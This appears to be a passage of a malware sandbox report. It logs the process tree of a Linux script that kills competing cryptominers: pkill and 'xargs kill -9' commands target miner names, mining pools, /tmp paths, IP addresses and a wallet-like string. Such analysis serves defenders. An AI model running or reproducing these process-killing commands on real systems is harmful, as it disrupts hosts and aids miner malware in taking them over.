                                                                                                                                                                                                                                                                                          grep -v -
                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                            PID:1724
                                                                                                                                                                                                                                                                                          • /usr/bin/awk
                                                                                                                                                                                                                                                                                            awk "-F[/]" "{print \$1}"
                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                              PID:1723
                                                                                                                                                                                                                                                                                            • /usr/bin/awk
                                                                                                                                                                                                                                                                                              awk "{print \$7}"
                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                PID:1722
                                                                                                                                                                                                                                                                                              • /usr/bin/grep
                                                                                                                                                                                                                                                                                                grep 34.81.218.76:9486
                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                  PID:1721
                                                                                                                                                                                                                                                                                                • /usr/bin/awk
                                                                                                                                                                                                                                                                                                  awk "-F[/]" "{print \$1}"
                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                    PID:1731
                                                                                                                                                                                                                                                                                                  • /usr/bin/grep
                                                                                                                                                                                                                                                                                                    grep -v -
                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                      PID:1732
                                                                                                                                                                                                                                                                                                    • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                      xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                      • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                      PID:1733
                                                                                                                                                                                                                                                                                                    • /usr/bin/awk
                                                                                                                                                                                                                                                                                                      awk "{print \$7}"
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                        PID:1730
                                                                                                                                                                                                                                                                                                      • /usr/bin/grep
                                                                                                                                                                                                                                                                                                        grep 42.112.28.216:9486
                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                          PID:1729
                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                          pkill -f .git/kthreaddw
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                                                                                                          PID:1736
                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                          pkill -f 80.211.206.105
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                                                                                                          PID:1738
                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                          pkill -f 207.38.87.6
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                                                                                                          PID:1740
                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                          pkill -f p8444
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                                                                                                          PID:1751
                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                          pkill -f supportxmr
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                                                                                                          PID:1767
                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                          pkill -f monero
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                                                                                                          PID:1779
                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                          pkill -f kthreaddi
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                                                                                                          PID:1780
                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                          pkill -f srv00
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                                                                                                          PID:1781
                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                          pkill -f /tmp/.javae/javae
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                                                                                                          PID:1782
                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                          pkill -f .javae
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                                                                                                          PID:1783
                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                          pkill -f .syna
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                                                                                                          PID:1784
                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                          pkill -f .main
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                                                                                                          PID:1785
                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                          pkill -f xmm
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                                                                                                          PID:1786
                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                          pkill -f solr.sh
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                                                                                                          PID:1787
                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                          pkill -f /tmp/.solr/solrd
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                                                                                                          PID:1788
                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                          pkill -f /tmp/javac
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                                                                                                          PID:1789
                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                          pkill -f /tmp/.go.sh
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                                                                                                          PID:1790
                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                          pkill -f /tmp/.x/agetty
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                                                                                                          PID:1791
                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                          pkill -f /tmp/.x/kworker
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                                                                                                          PID:1792
                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                          pkill -f c3pool
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                                                                                                          PID:1793
                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                          pkill -f /tmp/.X11-unix/gitag-ssh
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                                                                                                          PID:1794
                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                          pkill -f /tmp/1
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                                                                                                          PID:1795
                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                          pkill -f /tmp/okk.sh
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                                                                                                          PID:1796
                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                          pkill -f /tmp/gitaly
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                                                                                                          PID:1797
                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                          pkill -f /tmp/.x/kworker
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                                                                                                          PID:1798
                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                          pkill -f 43a6eY5zPm3UFCaygfsukfP94ZTHz6a1kZh5sm1aZFB
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                                                                                                          PID:1799
                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                          pkill -f /tmp/.X11-unix/supervise
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                                                                                                          PID:1800
                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                          pkill -f /tmp/.ssh/redis.sh
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                                                                                                          PID:1801
                                                                                                                                                                                                                                                                                                        • /usr/bin/awk
                                                                                                                                                                                                                                                                                                          awk "{print \$2}"
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                            PID:1805
                                                                                                                                                                                                                                                                                                          • /usr/bin/grep
                                                                                                                                                                                                                                                                                                            grep -v grep
                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                              PID:1804
                                                                                                                                                                                                                                                                                                            • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                              xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                              • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                              PID:1806
                                                                                                                                                                                                                                                                                                            • /usr/bin/grep
                                                                                                                                                                                                                                                                                                              grep ./udp
                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                PID:1803
                                                                                                                                                                                                                                                                                                              • /usr/bin/ps
                                                                                                                                                                                                                                                                                                                ps aux
                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                PID:1802
                                                                                                                                                                                                                                                                                                              • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                                PID:1808
                                                                                                                                                                                                                                                                                                              • /usr/bin/cat
                                                                                                                                                                                                                                                                                                                cat /tmp/.X11-unix/01
                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                  PID:1807
                                                                                                                                                                                                                                                                                                                • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                  xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                  • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                                  PID:1810
                                                                                                                                                                                                                                                                                                                • /usr/bin/cat
                                                                                                                                                                                                                                                                                                                  cat /tmp/.X11-unix/11
                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                    PID:1809
                                                                                                                                                                                                                                                                                                                  • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                    xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                    • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                                    PID:1812
                                                                                                                                                                                                                                                                                                                  • /usr/bin/cat
                                                                                                                                                                                                                                                                                                                    cat /tmp/.X11-unix/22
                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                      PID:1811
                                                                                                                                                                                                                                                                                                                    • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                      xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                      • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                                      PID:1814
                                                                                                                                                                                                                                                                                                                    • /usr/bin/cat
                                                                                                                                                                                                                                                                                                                      cat /tmp/.pg_stat.0
                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                        PID:1813
                                                                                                                                                                                                                                                                                                                      • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                        xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                        • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                                        PID:1816
                                                                                                                                                                                                                                                                                                                      • /usr/bin/cat
                                                                                                                                                                                                                                                                                                                        cat /tmp/.pg_stat.1
                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                          PID:1815
                                                                                                                                                                                                                                                                                                                        • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                          xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                          • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                                          PID:1818
                                                                                                                                                                                                                                                                                                                        • /usr/bin/cat
                                                                                                                                                                                                                                                                                                                          cat /data/./oka.pid
                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                            PID:1817
                                                                                                                                                                                                                                                                                                                          • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                            pkill -f zsvc
                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                            • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                            • Reads runtime system information
                                                                                                                                                                                                                                                                                                                            PID:1819
                                                                                                                                                                                                                                                                                                                          • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                            pkill -f pdefenderd
                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                            • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                            • Reads runtime system information
                                                                                                                                                                                                                                                                                                                            PID:1820
                                                                                                                                                                                                                                                                                                                          • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                            pkill -f updatecheckerd
                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                            • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                            • Reads runtime system information
                                                                                                                                                                                                                                                                                                                            PID:1821
                                                                                                                                                                                                                                                                                                                          • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                            pkill -f cruner
                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                            • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                            • Reads runtime system information
                                                                                                                                                                                                                                                                                                                            PID:1822
                                                                                                                                                                                                                                                                                                                          • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                            pkill -f dbused
                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                            • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                            PID:1823
                                                                                                                                                                                                                                                                                                                          • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                            pkill -f bashirc
                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                            • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                            • Reads runtime system information
                                                                                                                                                                                                                                                                                                                            PID:1824
                                                                                                                                                                                                                                                                                                                          • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                            pkill -f meminitsrv
                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                            • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                            PID:1825
                                                                                                                                                                                                                                                                                                                          • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                            xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                            • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                                            PID:1830
                                                                                                                                                                                                                                                                                                                          • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                            awk "{print \$2}"
                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                              PID:1829
                                                                                                                                                                                                                                                                                                                            • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                              grep -v grep
                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                PID:1828
                                                                                                                                                                                                                                                                                                                              • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                                grep ./oka
                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                  PID:1827
                                                                                                                                                                                                                                                                                                                                • /usr/bin/ps
                                                                                                                                                                                                                                                                                                                                  ps aux
                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                  • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                                  • Reads runtime system information
                                                                                                                                                                                                                                                                                                                                  PID:1826
                                                                                                                                                                                                                                                                                                                                • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                  xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                  • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                                                  PID:1835
                                                                                                                                                                                                                                                                                                                                • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                  awk "{print \$2}"
                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                    PID:1834
                                                                                                                                                                                                                                                                                                                                  • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                                    grep -v grep
                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                      PID:1833
                                                                                                                                                                                                                                                                                                                                    • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                                      grep "postgres: autovacum"
                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                        PID:1832
                                                                                                                                                                                                                                                                                                                                      • /usr/bin/ps
                                                                                                                                                                                                                                                                                                                                        ps aux
                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                        • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                                        • Reads runtime system information
                                                                                                                                                                                                                                                                                                                                        PID:1831
                                                                                                                                                                                                                                                                                                                                      • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                                        grep -v proxymap
                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                          PID:1842
                                                                                                                                                                                                                                                                                                                                        • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                                          grep -v postgres
                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                            PID:1843
                                                                                                                                                                                                                                                                                                                                          • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                            xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                            • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                                                            PID:1847
                                                                                                                                                                                                                                                                                                                                          • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                                            grep -v postgrey
                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                              PID:1844
                                                                                                                                                                                                                                                                                                                                            • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                                              grep -v kinsing
                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                PID:1845
                                                                                                                                                                                                                                                                                                                                              • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                awk "{print \$2}"
                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                  PID:1846
                                                                                                                                                                                                                                                                                                                                                • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                                                  grep -v php-fpm
                                                                                                                                                                                                                                                                                                                                                    PID:1841
                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                                                    grep -v "("
                                                                                                                                                                                                                                                                                                                                                      PID:1840
                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                                                      grep -v "\\["
                                                                                                                                                                                                                                                                                                                                                        PID:1839
                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                                                        grep -v bin
                                                                                                                                                                                                                                                                                                                                                          PID:1838
                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                          awk "length(\$1) == 8"
                                                                                                                                                                                                                                                                                                                                                            PID:1837
                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/ps
                                                                                                                                                                                                                                                                                                                                                            ps ax -o "command,pid" -www
                                                                                                                                                                                                                                                                                                                                                            • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                                                            • Reads runtime system information
                                                                                                                                                                                                                                                                                                                                                            PID:1836
                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                                                            grep -v proxymap
                                                                                                                                                                                                                                                                                                                                                              PID:1854
                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                                                              grep -v postgres
                                                                                                                                                                                                                                                                                                                                                                PID:1855
                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                                                                grep -v postgrey
                                                                                                                                                                                                                                                                                                                                                                  PID:1856
                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                  awk "{print \$2}"
                                                                                                                                                                                                                                                                                                                                                                    PID:1857
                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                                                    xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                                                                    • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                                                                                    PID:1858
                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                                                                    grep -v php-fpm
                                                                                                                                                                                                                                                                                                                                                                      PID:1853
                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                                                                      grep -v "("
                                                                                                                                                                                                                                                                                                                                                                        PID:1852
                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                                                                        grep -v "\\["
                                                                                                                                                                                                                                                                                                                                                                          PID:1851
                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                                                                          grep -v bin
                                                                                                                                                                                                                                                                                                                                                                            PID:1850
                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                            awk "length(\$1) == 16"
                                                                                                                                                                                                                                                                                                                                                                              PID:1849
                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/ps
                                                                                                                                                                                                                                                                                                                                                                              ps ax -o "command,pid" -www
                                                                                                                                                                                                                                                                                                                                                                              • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                                                                              • Reads runtime system information
                                                                                                                                                                                                                                                                                                                                                                              PID:1848
                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                                                                              grep -v proxymap
                                                                                                                                                                                                                                                                                                                                                                                PID:1865
                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                                                                                grep -v postgres
                                                                                                                                                                                                                                                                                                                                                                                  PID:1866
                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                                                                                  grep -v postgrey
                                                                                                                                                                                                                                                                                                                                                                                    PID:1867
                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                    awk "{print \$1}"
                                                                                                                                                                                                                                                                                                                                                                                      PID:1868
                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                                                                      xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                      • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                                                                                                      PID:1869
                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                                                                                      grep -v php-fpm
                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:1864
                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                                                                                        grep -v "("
                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:1863
                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                                                                                          grep -v "\\["
                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:1862
                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                                                                                            grep -v bin
                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:1861
                                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                              awk "length(\$5) == 8"
                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                PID:1860
                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/ps
                                                                                                                                                                                                                                                                                                                                                                                                ps ax
                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                                                                                                • Reads runtime system information
                                                                                                                                                                                                                                                                                                                                                                                                PID:1859
                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                                                                                xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                                                                                                                PID:1874
                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                awk "{print \$2}"
                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                  PID:1873
                                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                  grep /tmp/sscks
                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                    PID:1872
                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                    grep -v grep
                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                      PID:1871
                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/ps
                                                                                                                                                                                                                                                                                                                                                                                                      ps aux
                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
